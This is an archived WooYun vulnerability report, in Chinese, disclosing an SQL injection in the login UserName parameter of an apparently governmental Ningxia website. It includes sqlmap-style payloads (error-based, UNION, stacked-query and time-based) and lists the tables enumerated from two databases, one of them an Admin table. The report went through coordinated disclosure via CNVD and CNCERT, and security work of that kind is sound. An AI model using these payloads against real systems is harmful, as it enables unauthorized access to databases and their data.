乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-10: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商已经确认,细节仅向厂商公开 2015-07-24: 细节向核心白帽子及相关领域专家公开 2015-08-03: 细节向普通白帽子公开 2015-08-13: 细节向实习白帽子公开 2015-08-28: 细节向公众公开
上次提过了,但是审核没过,也许是只给了数据库出来,没把表列出来,涉及的相关信息还是很多的。
Place: POSTParameter: UserName Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: UserName=admin' AND 9534=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(121)+CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (9534=9534) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(101)+CHAR(100)+CHAR(119)+CHAR(58))) AND 'Nsxl'='Nsxl&PWD=sss Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: UserName=admin' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(110)+CHAR(121)+CHAR(103)+CHAR(58)+CHAR(83)+CHAR(117)+CHAR(70)+CHAR(80)+CHAR(68)+CHAR(66)+CHAR(87)+CHAR(80)+CHAR(106)+CHAR(71)+CHAR(58)+CHAR(101)+CHAR(100)+CHAR(119)+CHAR(58), NULL, NULL, NULL-- &PWD=sss Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: UserName=admin'; WAITFOR DELAY '0:0:5';--&PWD=sss Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: UserName=admin' WAITFOR DELAY '0:0:5'--&PWD=sss
上次只给了这几个数据库,当时也只到这儿就没深入了。
这次继续深入。
Database: Northwind[32 tables]+--------------------------------------+| dbo.Categories || dbo.CustomerCustomerDemo || dbo.CustomerDemographics || dbo.Customers || dbo.EmployeeTerritories || dbo.Employees || dbo.Invoices || dbo.Region || dbo.Shippers || dbo.Suppliers || dbo.Territories || dbo.[Alphabetical list of products] || dbo.[Category Sales for 1997] || dbo.[Current Product List] || dbo.[Customer and Suppliers by City] || dbo.[Order Details Extended] || dbo.[Order Details Extended] || dbo.[Order Subtotals] || dbo.[Orders Qry] || dbo.[Orders Qry] || dbo.[Product Sales for 1997] || dbo.[Products Above Average Price] || dbo.[Products Above Average Price] || dbo.[Products by Category] || dbo.[Quarterly Orders] || dbo.[Sales Totals by Amount] || dbo.[Sales by Category] || dbo.[Summary of Sales by Quarter] || dbo.[Summary of Sales by Year] || dbo.dtproperties || dbo.sysconstraints || dbo.syssegments |+--------------------------------------+
可以看到很多相关的信息。一些年度的销量啊,产品的价格啊以及员工啊,我想到这儿应该就可以证明了这个洞的重要性吧。表的详细内容就不深入了,毕竟政府站
以下是其他相对重要库的表
Database: nx_lyt[32 tables]+---------------------+| dbo.Admin || dbo.Affiche || dbo.Article || dbo.ArticleClass || dbo.Cities || dbo.Counter || dbo.Customers || dbo.D99_CMD || dbo.D99_REG || dbo.Depart || dbo.Link || dbo.Order_Titles || dbo.Pop_window || dbo.Public_news || dbo.Userandip || dbo.Vote || dbo.WebCount || dbo.X_4401 || dbo.X_5512 || dbo.X_7508 || dbo.Zzday || dbo.[nxfor.D99_Tmp] || dbo.comd_list || dbo.dtproperties || dbo.form || dbo.link_tu || dbo.quhua || dbo.qushu || dbo.sysconstraints || dbo.syssegments || dbo.vote_class || dbo.vote_vote |+---------------------+
这样应该能过了吧,审核大大
过滤
危害等级:中
漏洞Rank:9
确认时间:2015-07-14 16:41
CNVD确认所述情况,已经转由CNCERT下发给宁夏分中心,由其后续协调网站管理单位处置。
暂无